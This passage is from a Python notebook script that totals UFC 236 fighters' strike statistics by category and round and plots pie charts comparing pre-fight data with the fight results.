explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.subplot(222)
plt.title('Dwight Grant Round 3')
labels = 'Normal', 'Clinch','Distance','Ground'
sizes = [category(getRoundStats(Grant,3),'n'),category(getRoundStats(Grant,3),'c'),category(getRoundStats(Grant,3),'d'),category(getRoundStats(Grant,3),'g')]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.figure(1)
plt.show
# Ovince Saint Preux (23-12-0) vs Nikita Krylov (24-6-0) : Round 3
# In[25]:
plt.subplot(221)
plt.title('Ovince Saint Preux Round 3')
labels = 'Normal', 'Clinch','Distance','Ground'
sizes = [category(getRoundStats(Preux,3),'n'),category(getRoundStats(Preux,3),'c'),category(getRoundStats(Preux,3),'d'),category(getRoundStats(Preux,3),'g')]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.subplot(222)
plt.title('Nikita Krylov Round 3')
labels = 'Normal', 'Clinch','Distance','Ground'
sizes = [category(getRoundStats(Krylov,3),'n'),category(getRoundStats(Krylov,3),'c'),category(getRoundStats(Krylov,3),'d'),category(getRoundStats(Krylov,3),'g')]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.figure(1)
plt.show
# # Totals
#
# Instead of getting statistics per round. Totals sums up all the stats per round to make the data into one. Once the data is gathered, More pie charts are made for comparison between opponents
# In[26]:
# Holloway
HNormal = (category(getRoundStats(Holloway,1),'n') + category(getRoundStats(Holloway,2),'n') + category(getRoundStats(Holloway,3),'n')).round(1)
HDistance = (category(getRoundStats(Holloway,1),'d') + category(getRoundStats(Holloway,2),'d') + category(getRoundStats(Holloway,3),'d')).round(1)
HClinch = (category(getRoundStats(Holloway,1),'c') + category(getRoundStats(Holloway,2),'c') + category(getRoundStats(Holloway,3),'c')).round(1)
HGround = (category(getRoundStats(Holloway,1),'g') + category(getRoundStats(Holloway,2),'g') + category(getRoundStats(Holloway,3),'g')).round(1)
print(HNormal,HDistance,HClinch,HGround)
# Poirier
PNormal = (category(getRoundStats(Poirier,1),'n') + category(getRoundStats(Poirier,2),'n') + category(getRoundStats(Poirier ,3),'n')).round(1)
PDistance = (category(getRoundStats(Poirier,1),'d') + category(getRoundStats(Poirier,2),'d') + category(getRoundStats(Poirier ,3),'d')).round(1)
PClinch = (category(getRoundStats(Poirier,1),'c') + category(getRoundStats(Poirier,2),'c') + category(getRoundStats(Poirier ,3),'c')).round(1)
PGround = (category(getRoundStats(Poirier,1),'g') + category(getRoundStats(Poirier,2),'g') + category(getRoundStats(Poirier ,3),'g')).round(1)
print(PNormal,PDistance,PClinch,PGround)
# Gastelum
GNormal = (category(getRoundStats(Gastelum,1),'n') + category(getRoundStats(Gastelum,2),'n') + category(getRoundStats(Gastelum,3),'n')).round(1)
GDistance = (category(getRoundStats(Gastelum,1),'d') + category(getRoundStats(Gastelum,2),'d') + category(getRoundStats(Gastelum,3),'d')).round(1)
GClinch = (category(getRoundStats(Gastelum,1),'c') + category(getRoundStats(Gastelum,2),'c') + category(getRoundStats(Gastelum,3),'c')).round(1)
GGround = (category(getRoundStats(Gastelum,1),'g') + category(getRoundStats(Gastelum,2),'g') + category(getRoundStats(Gastelum,3),'g')).round(1)
# Adesanya
ANormal = (category(getRoundStats(Adesanya ,1),'n') + category(getRoundStats(Adesanya ,2),'n') + category(getRoundStats(Adesanya ,3),'n')).round(1)
ADistance = (category(getRoundStats(Adesanya ,1),'d') + category(getRoundStats(Adesanya ,2),'d') + category(getRoundStats(Adesanya ,3),'d')).round(1)
AClinch = (category(getRoundStats(Adesanya ,1),'c') + category(getRoundStats(Adesanya ,2),'c') + category(getRoundStats(Adesanya ,3),'c')).round(1)
AGround = (category(getRoundStats(Adesanya ,1),'g') + category(getRoundStats(Adesanya ,2),'g') + category(getRoundStats(Adesanya ,3),'g')).round(1)
print(ANormal,ADistance,AClinch,AGround)
# Anders
AnNormal = (category(getRoundStats(Anders,1),'n') + category(getRoundStats(Anders,2),'n') + category(getRoundStats(Anders,3),'n')).round(1)
AnDistance = (category(getRoundStats(Anders,1),'d') + category(getRoundStats(Anders,2),'d') + category(getRoundStats(Anders,3),'d')).round(1)
AnClinch = (category(getRoundStats(Anders,1),'c') + category(getRoundStats(Anders,2),'c') + category(getRoundStats(Anders,3),'c')).round(1)
AnGround = (category(getRoundStats(Anders,1),'g') + category(getRoundStats(Anders,2),'g') + category(getRoundStats(Anders,3),'g')).round(1)
print(AnNormal,AnDistance,AnClinch,AnGround)
# RountreeJr
RNormal = (category(getRoundStats(RountreeJr,1),'n') + category(getRoundStats(RountreeJr,2),'n') + category(getRoundStats(RountreeJr,3),'n')).round(1)
RDistance = (category(getRoundStats(RountreeJr,1),'d') + category(getRoundStats(RountreeJr,2),'d') + category(getRoundStats(RountreeJr,3),'d')).round(1)
RClinch = (category(getRoundStats(RountreeJr,1),'c') + category(getRoundStats(RountreeJr,2),'c') + category(getRoundStats(RountreeJr,3),'c')).round(1)
RGround = (category(getRoundStats(RountreeJr,1),'g') + category(getRoundStats(RountreeJr,2),'g') + category(getRoundStats(RountreeJr,3),'g')).round(1)
print(RNormal,RDistance,RClinch,RGround)
# Jouban
JNormal = (category(getRoundStats(Jouban,1),'n') + category(getRoundStats(Jouban,2),'n') + category(getRoundStats(Jouban,3),'n')).round(1)
JDistance = (category(getRoundStats(Jouban,1),'d') + category(getRoundStats(Jouban,2),'d') + category(getRoundStats(Jouban,3),'d')).round(1)
JClinch = (category(getRoundStats(Jouban,1),'c') + category(getRoundStats(Jouban,2),'c') + category(getRoundStats(Jouban,3),'c')).round(1)
JGround = (category(getRoundStats(Jouban,1),'g') + category(getRoundStats(Jouban,2),'g') + category(getRoundStats(Jouban,3),'g')).round(1)
print(JNormal,JDistance,JClinch,JGround)
# Grant
GrNormal = (category(getRoundStats(Grant,1),'n') + category(getRoundStats(Grant,2),'n') + category(getRoundStats(Grant,3),'n')).round(1)
GrDistance = (category(getRoundStats(Grant,1),'d') + category(getRoundStats(Grant,2),'d') + category(getRoundStats(Grant,3),'d')).round(1)
GrClinch = (category(getRoundStats(Grant,1),'c') + category(getRoundStats(Grant,2),'c') + category(getRoundStats(Grant,3),'c')).round(1)
GrGround = (category(getRoundStats(Grant,1),'g') + category(getRoundStats(Grant,2),'g') + category(getRoundStats(Grant,3),'g')).round(1)
print(PNormal,PDistance,PClinch,PGround)
# Preux
PrNormal = (category(getRoundStats(Preux,1),'n') + category(getRoundStats(Preux,2),'n') + category(getRoundStats(Preux,3),'n')).round(1)
PrDistance = (category(getRoundStats(Preux,1),'d') + category(getRoundStats(Preux,2),'d') + category(getRoundStats(Preux,3),'d')).round(1)
PrClinch = (category(getRoundStats(Preux,1),'c') + category(getRoundStats(Preux,2),'c') + category(getRoundStats(Preux,3),'c')).round(1)
PrGround = (category(getRoundStats(Preux,1),'g') + category(getRoundStats(Preux,2),'g') + category(getRoundStats(Preux,3),'g')).round(1)
print(PrNormal,PrDistance,PrClinch,PrGround)
# Krylov
KNormal = (category(getRoundStats(Krylov,1),'n') + category(getRoundStats(Krylov,2),'n') + category(getRoundStats(Krylov,3),'n')).round(1)
KDistance = (category(getRoundStats(Krylov,1),'d') + category(getRoundStats(Krylov,2),'d') + category(getRoundStats(Krylov,3),'d')).round(1)
KClinch = (category(getRoundStats(Krylov,1),'c') + category(getRoundStats(Krylov,2),'c') + category(getRoundStats(Krylov,3),'c')).round(1)
KGround = (category(getRoundStats(Krylov,1),'g') + category(getRoundStats(Krylov,2),'g') + category(getRoundStats(Krylov,3),'g')).round(1)
print(KNormal,KDistance,KClinch,KGround)
# Max Holloway (20 - 3 - 0) vs Dustin Poirier (24-5-0) : Total
# In[27]:
plt.subplot(221)
plt.title('Max Holloway Total')
labels = 'Clinch','Distance','Ground','Normal'
sizes = [HClinch,HDistance,HGround,HNormal]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.subplot(222)
plt.title('Dustin Poirier Total')
labels = 'Clinch','Distance','Ground','Normal'
sizes = [PClinch,PDistance,PGround,PNormal]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.figure(1)
plt.show
# Kelvin Gastelum (16-3-0) vs Israel Adesanya (16-0-0) : Total
# In[28]:
plt.subplot(221)
plt.title('Kelvin Gastelum Total')
labels = 'Clinch','Distance','Ground','Normal'
sizes = [GClinch, GDistance, GGround, GNormal]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.subplot(222)
plt.title('Israel Adesanya Total')
labels = 'Clinch','Distance','Ground','Normal'
sizes = [AClinch, ADistance, AGround, ANormal]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.figure(1)
plt.show
# Eryk Anders (11-3-0) vs Khalil Rountree Jr. (7-3-0) : Total
# In[29]:
plt.subplot(221)
plt.title('Eryk Anders Total')
labels = 'Clinch','Distance','Ground','Normal'
sizes = [AnClinch, AnDistance, AnGround, AnNormal]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.subplot(222)
plt.title('Khalil Rountree Jr Total')
labels = 'Clinch','Distance','Ground','Normal'
sizes = [RClinch, RDistance, RGround, RNormal]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.figure(1)
plt.show
# Alan Jouban (16-6-0) vs Dwight Grant (9-2-0) : Total
# In[30]:
plt.subplot(221)
plt.title('Alan Jouban Total')
labels = 'Clinch','Distance','Ground','Normal'
sizes = [JClinch, JDistance, JGround, JNormal]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.subplot(222)
plt.title('Dwight Grant Total')
labels = 'Clinch','Distance','Ground','Normal'
sizes = [GrClinch, GrDistance, GrGround, GrNormal]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.figure(1)
plt.show
# Ovince Saint Preux (23-12-0) vs Nikita Krylov (24-6-0) ; Total
# In[31]:
plt.subplot(221)
plt.title('Ovince Saint Preux Total')
labels = 'Clinch','Distance','Ground','Normal'
sizes = [PrClinch, PrDistance, PrGround, PrNormal]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.subplot(222)
plt.title('Nikita Krylov Total')
labels = 'Clinch','Distance','Ground','Normal'
sizes = [KClinch, KDistance, KGround, KNormal]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.figure(1)
plt.show
# # Results
#
# On April 13th, UFC 236 took place. The data from the fights were recorded into an alike table to the first table that was used. With the data, the same process was made by creating pie charts using the data.
# In[32]:
results = pd.read_csv('UFC_Winenrs.csv')
# print(results.columns)
print(results)
results = results.drop([10], axis = 0)
print(results)
# In[33]:
Results_Holloway = getFighterStats('Max Holloway', results)
Results_Poirier = getFighterStats('Dustin Poirier', results)
Results_Gastelum = getFighterStats('Kelvin Gastelum',results)
Results_Adesanya = getFighterStats('Israel Adesanya',results)
Results_Anders = getFighterStats('Eryk Anders',results)
Results_RountreeJr = getFighterStats('Khalil Rountree Jr.',results)
Results_Jouban = getFighterStats('Alan Jouban',results)
Results_Grant = getFighterStats('Dwight Grant',results)
Results_Preux = getFighterStats('Saint Preux',results)
Results_Krylov = getFighterStats('Nikita Krylov',results)
# In[34]:
# Holloway
Results_HNormal = (category(getRoundStats(Results_Holloway,1),'n') + category(getRoundStats(Results_Holloway,2),'n') + category(getRoundStats(Results_Holloway,3),'n')).round(1)
Results_HDistance = (category(getRoundStats(Results_Holloway,1),'d') + category(getRoundStats(Results_Holloway,2),'d') + category(getRoundStats(Results_Holloway,3),'d')).round(1)
Results_HClinch = (category(getRoundStats(Results_Holloway,1),'c') + category(getRoundStats(Results_Holloway,2),'c') + category(getRoundStats(Results_Holloway,3),'c')).round(1)
Results_HGround = (category(getRoundStats(Results_Holloway,1),'g') + category(getRoundStats(Results_Holloway,2),'g') + category(getRoundStats(Results_Holloway,3),'g')).round(1)
print(Results_HNormal,Results_HDistance,Results_HClinch,Results_HGround)
# Poirier
Results_PNormal = (category(getRoundStats(Results_Poirier,1),'n') + category(getRoundStats(Results_Poirier,2),'n') + category(getRoundStats(Results_Poirier ,3),'n')).round(1)
Results_PDistance = (category(getRoundStats(Results_Poirier,1),'d') + category(getRoundStats(Results_Poirier,2),'d') + category(getRoundStats(Results_Poirier ,3),'d')).round(1)
Results_PClinch = (category(getRoundStats(Results_Poirier,1),'c') + category(getRoundStats(Results_Poirier,2),'c') + category(getRoundStats(Results_Poirier ,3),'c')).round(1)
Results_PGround = (category(getRoundStats(Results_Poirier,1),'g') + category(getRoundStats(Results_Poirier,2),'g') + category(getRoundStats(Results_Poirier ,3),'g')).round(1)
print(Results_PNormal,Results_PDistance,Results_PClinch,Results_PGround)
# Gastelum
Results_GNormal = (category(getRoundStats(Results_Gastelum,1),'n') + category(getRoundStats(Results_Gastelum,2),'n') + category(getRoundStats(Results_Gastelum,3),'n')).round(1)
Results_GDistance = (category(getRoundStats(Results_Gastelum,1),'d') + category(getRoundStats(Results_Gastelum,2),'d') + category(getRoundStats(Results_Gastelum,3),'d')).round(1)
Results_GClinch = (category(getRoundStats(Results_Gastelum,1),'c') + category(getRoundStats(Results_Gastelum,2),'c') + category(getRoundStats(Results_Gastelum,3),'c')).round(1)
Results_GGround = (category(getRoundStats(Results_Gastelum,1),'g') + category(getRoundStats(Results_Gastelum,2),'g') + category(getRoundStats(Results_Gastelum,3),'g')).round(1)
print(Results_GNormal,Results_GDistance,Results_GClinch,Results_GGround)
# Adesanya
Results_ANormal = (category(getRoundStats(Results_Adesanya ,1),'n') + category(getRoundStats(Results_Adesanya ,2),'n') + category(getRoundStats(Results_Adesanya ,3),'n')).round(1)
Results_ADistance = (category(getRoundStats(Results_Adesanya ,1),'d') + category(getRoundStats(Results_Adesanya ,2),'d') + category(getRoundStats(Results_Adesanya ,3),'d')).round(1)
Results_AClinch = (category(getRoundStats(Results_Adesanya ,1),'c') + category(getRoundStats(Results_Adesanya ,2),'c') + category(getRoundStats(Results_Adesanya ,3),'c')).round(1)
Results_AGround = (category(getRoundStats(Results_Adesanya ,1),'g') + category(getRoundStats(Results_Adesanya ,2),'g') + category(getRoundStats(Results_Adesanya ,3),'g')).round(1)
print(Results_ANormal,Results_ADistance,Results_AClinch,Results_AGround)
# Anders
Results_AnNormal = (category(getRoundStats(Results_Anders,1),'n') + category(getRoundStats(Results_Anders,2),'n') + category(getRoundStats(Results_Anders,3),'n')).round(1)
Results_AnDistance = (category(getRoundStats(Results_Anders,1),'d') + category(getRoundStats(Results_Anders,2),'d') + category(getRoundStats(Results_Anders,3),'d')).round(1)
Results_AnClinch = (category(getRoundStats(Results_Anders,1),'c') + category(getRoundStats(Results_Anders,2),'c') + category(getRoundStats(Results_Anders,3),'c')).round(1)
Results_AnGround = (category(getRoundStats(Results_Anders,1),'g') + category(getRoundStats(Results_Anders,2),'g') + category(getRoundStats(Results_Anders,3),'g')).round(1)
print(Results_AnNormal,Results_AnDistance,Results_AnClinch,Results_AnGround)
# RountreeJr
Results_RNormal = (category(getRoundStats(Results_RountreeJr,1),'n') + category(getRoundStats(Results_RountreeJr,2),'n') + category(getRoundStats(Results_RountreeJr,3),'n')).round(1)
Results_RDistance = (category(getRoundStats(Results_RountreeJr,1),'d') + category(getRoundStats(Results_RountreeJr,2),'d') + category(getRoundStats(Results_RountreeJr,3),'d')).round(1)
Results_RClinch = (category(getRoundStats(Results_RountreeJr,1),'c') + category(getRoundStats(Results_RountreeJr,2),'c') + category(getRoundStats(Results_RountreeJr,3),'c')).round(1)
Results_RGround = (category(getRoundStats(Results_RountreeJr,1),'g') + category(getRoundStats(Results_RountreeJr,2),'g') + category(getRoundStats(Results_RountreeJr,3),'g')).round(1)
print(Results_RNormal,Results_RDistance,Results_RClinch,Results_RGround)
# Jouban
Results_JNormal = (category(getRoundStats(Results_Jouban,1),'n') + category(getRoundStats(Results_Jouban,2),'n') + category(getRoundStats(Results_Jouban,3),'n')).round(1)
Results_JDistance = (category(getRoundStats(Results_Jouban,1),'d') + category(getRoundStats(Results_Jouban,2),'d') + category(getRoundStats(Results_Jouban,3),'d')).round(1)
Results_JClinch = (category(getRoundStats(Results_Jouban,1),'c') + category(getRoundStats(Results_Jouban,2),'c') + category(getRoundStats(Results_Jouban,3),'c')).round(1)
Results_JGround = (category(getRoundStats(Results_Jouban,1),'g') + category(getRoundStats(Results_Jouban,2),'g') + category(getRoundStats(Results_Jouban,3),'g')).round(1)
print(Results_JNormal,Results_JDistance,Results_JClinch,Results_JGround)
# Grant
Results_GrNormal = (category(getRoundStats(Results_Grant,1),'n') + category(getRoundStats(Results_Grant,2),'n') + category(getRoundStats(Results_Grant,3),'n')).round(1)
Results_GrDistance = (category(getRoundStats(Results_Grant,1),'d') + category(getRoundStats(Results_Grant,2),'d') + category(getRoundStats(Results_Grant,3),'d')).round(1)
Results_GrClinch = (category(getRoundStats(Results_Grant,1),'c') + category(getRoundStats(Results_Grant,2),'c') + category(getRoundStats(Results_Grant,3),'c')).round(1)
Results_GrGround = (category(getRoundStats(Results_Grant,1),'g') + category(getRoundStats(Results_Grant,2),'g') + category(getRoundStats(Results_Grant,3),'g')).round(1)
print(Results_PNormal,Results_PDistance,Results_PClinch,Results_PGround)
# Preux
Results_PrNormal = (category(getRoundStats(Results_Preux,1),'n') + category(getRoundStats(Results_Preux,2),'n') + category(getRoundStats(Results_Preux,3),'n')).round(1)
Results_PrDistance = (category(getRoundStats(Results_Preux,1),'d') + category(getRoundStats(Results_Preux,2),'d') + category(getRoundStats(Results_Preux,3),'d')).round(1)
Results_PrClinch = (category(getRoundStats(Results_Preux,1),'c') + category(getRoundStats(Results_Preux,2),'c') + category(getRoundStats(Results_Preux,3),'c')).round(1)
Results_PrGround = (category(getRoundStats(Results_Preux,1),'g') + category(getRoundStats(Results_Preux,2),'g') + category(getRoundStats(Results_Preux,3),'g')).round(1)
print(Results_PrNormal,Results_PrDistance,Results_PrClinch,Results_PrGround)
# Krylov
Results_KNormal = (category(getRoundStats(Results_Krylov,1),'n') + category(getRoundStats(Results_Krylov,2),'n') + category(getRoundStats(Results_Krylov,3),'n')).round(1)
Results_KDistance = (category(getRoundStats(Results_Krylov,1),'d') + category(getRoundStats(Results_Krylov,2),'d') + category(getRoundStats(Results_Krylov,3),'d')).round(1)
Results_KClinch = (category(getRoundStats(Results_Krylov,1),'c') + category(getRoundStats(Results_Krylov,2),'c') + category(getRoundStats(Results_Krylov,3),'c')).round(1)
Results_KGround = (category(getRoundStats(Results_Krylov,1),'g') + category(getRoundStats(Results_Krylov,2),'g') + category(getRoundStats(Results_Krylov,3),'g')).round(1)
print(Results_KNormal,Results_KDistance,Results_KClinch,Results_KGround)
# Max Holloway (20 - 3 - 0) vs Dustin Poirier (24-5-0) : Results
# In[35]:
plt.subplot(221)
plt.title('Max Holloway Results')
labels = 'Clinch','Distance','Ground','Normal'
sizes = [Results_HClinch,Results_HDistance,Results_HGround,Results_HNormal]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.subplot(222)
plt.title('Dustin Poirier Results')
labels = 'Clinch','Distance','Ground','Normal'
sizes = [Results_PClinch,Results_PDistance,Results_PGround,Results_PNormal]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.figure(1)
plt.show
# Kelvin Gastelum (16-3-0) vs Israel Adesanya (16-0-0) : Result
# In[36]:
plt.subplot(221)
plt.title('Kelvin Gastelum Results')
labels = 'Clinch','Distance','Ground','Normal'
sizes = [Results_GClinch, Results_GDistance, Results_GGround, Results_GNormal]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.subplot(222)
plt.title('Israel Adesanya Results')
labels = 'Clinch','Distance','Ground','Normal'
sizes = [Results_AClinch, Results_ADistance, Results_AGround, Results_ANormal]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.figure(1)
plt.show
# Eryk Anders (11-3-0) vs Khalil Rountree Jr. (7-3-0) : Result
# In[37]:
plt.subplot(221)
plt.title('Eryk Anders Results')
labels = 'Clinch','Distance','Ground','Normal'
sizes = [Results_AnClinch, Results_AnDistance, Results_AnGround, Results_AnNormal]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.subplot(222)
plt.title('Khalil Rountree Jr Results')
labels = 'Clinch','Distance','Ground','Normal'
sizes = [Results_RClinch, Results_RDistance, Results_RGround, Results_RNormal]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.figure(1)
plt.show
# Alan Jouban (16-6-0) vs Dwight Grant (9-2-0) ; Result
# In[38]:
plt.subplot(221)
plt.title('Alan Jouban Results')
labels = 'Clinch','Distance','Ground','Normal'
sizes = [Results_JClinch, Results_JDistance, Results_JGround, Results_JNormal]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.subplot(222)
plt.title('Dwight Grant Results')
labels = 'Clinch','Distance','Ground','Normal'
sizes = [Results_GrClinch, Results_GrDistance, Results_GrGround, Results_GrNormal]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.figure(1)
plt.show
# Ovince Saint Preux (23-12-0) vs Nikita Krylov (24-6-0) : Result
# In[39]:
plt.subplot(221)
plt.title('Ovince Saint Preux Results')
labels = 'Clinch','Distance','Ground','Normal'
sizes = [Results_PrClinch, Results_PrDistance, Results_PrGround, Results_PrNormal]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.subplot(222)
plt.title('Nikita Krylov Results')
labels = 'Clinch','Distance','Ground','Normal'
sizes = [Results_KClinch, Results_KDistance, Results_KGround, Results_KNormal]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.figure(1)
plt.show
# # Comparing Total vs Result
#
# This section compares the results I found using the methods and made vs the results of UFC 236
# ## Max Holloway
# In[40]:
plt.subplot(221)
plt.title('Max Holloway Total')
labels = 'Clinch','Distance','Ground','Normal'
sizes = [HClinch,HDistance,HGround,HNormal]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.subplot(222)
plt.title('Max Holloway Results')
labels = 'Clinch','Distance','Ground','Normal'
sizes = [Results_HClinch,Results_HDistance,Results_HGround,Results_HNormal]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.figure(1)
plt.show
# ## Dustin Poirier
# In[41]:
plt.subplot(221)
plt.title('Dustin Poirier Total')
labels = 'Clinch','Distance','Ground','Normal'
sizes = [PClinch,PDistance,PGround,PNormal]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.subplot(222)
plt.title('Dustin Poirier Result')
labels = 'Clinch','Distance','Ground','Normal'
sizes = [Results_PClinch,Results_PDistance,Results_PGround,Results_PNormal]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.figure(1)
plt.show
# ## Kelvin Gastelum
# In[42]:
plt.subplot(221)
plt.title('kelvin Gastelum Total')
labels = 'Clinch','Distance','Ground','Normal'
sizes = [GClinch, GDistance, GGround, GNormal]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.subplot(222)
plt.title('Kevin Gastelum Result')
labels = 'Clinch','Distance','Ground','Normal'
sizes = [Results_GClinch, Results_GDistance, Results_GGround, Results_GNormal]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.figure(1)
plt.show
# ## Israel Adesanya
# In[43]:
plt.subplot(221)
plt.title('Israel Adesanya Total')
labels = 'Clinch','Distance','Ground','Normal'
sizes = [AClinch, ADistance, AGround, ANormal]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.subplot(222)
plt.title('Israel Adesanya Results')
labels = 'Clinch','Distance','Ground','Normal'
sizes = [Results_AClinch, Results_ADistance, Results_AGround, Results_ANormal]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.figure(1)
plt.show
# ## Eryk Anders
# In[44]:
plt.subplot(221)
plt.title('Eryk Anders Total')
labels = 'Clinch','Distance','Ground','Normal'
sizes = [AnClinch, AnDistance, AnGround, AnNormal]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.subplot(222)
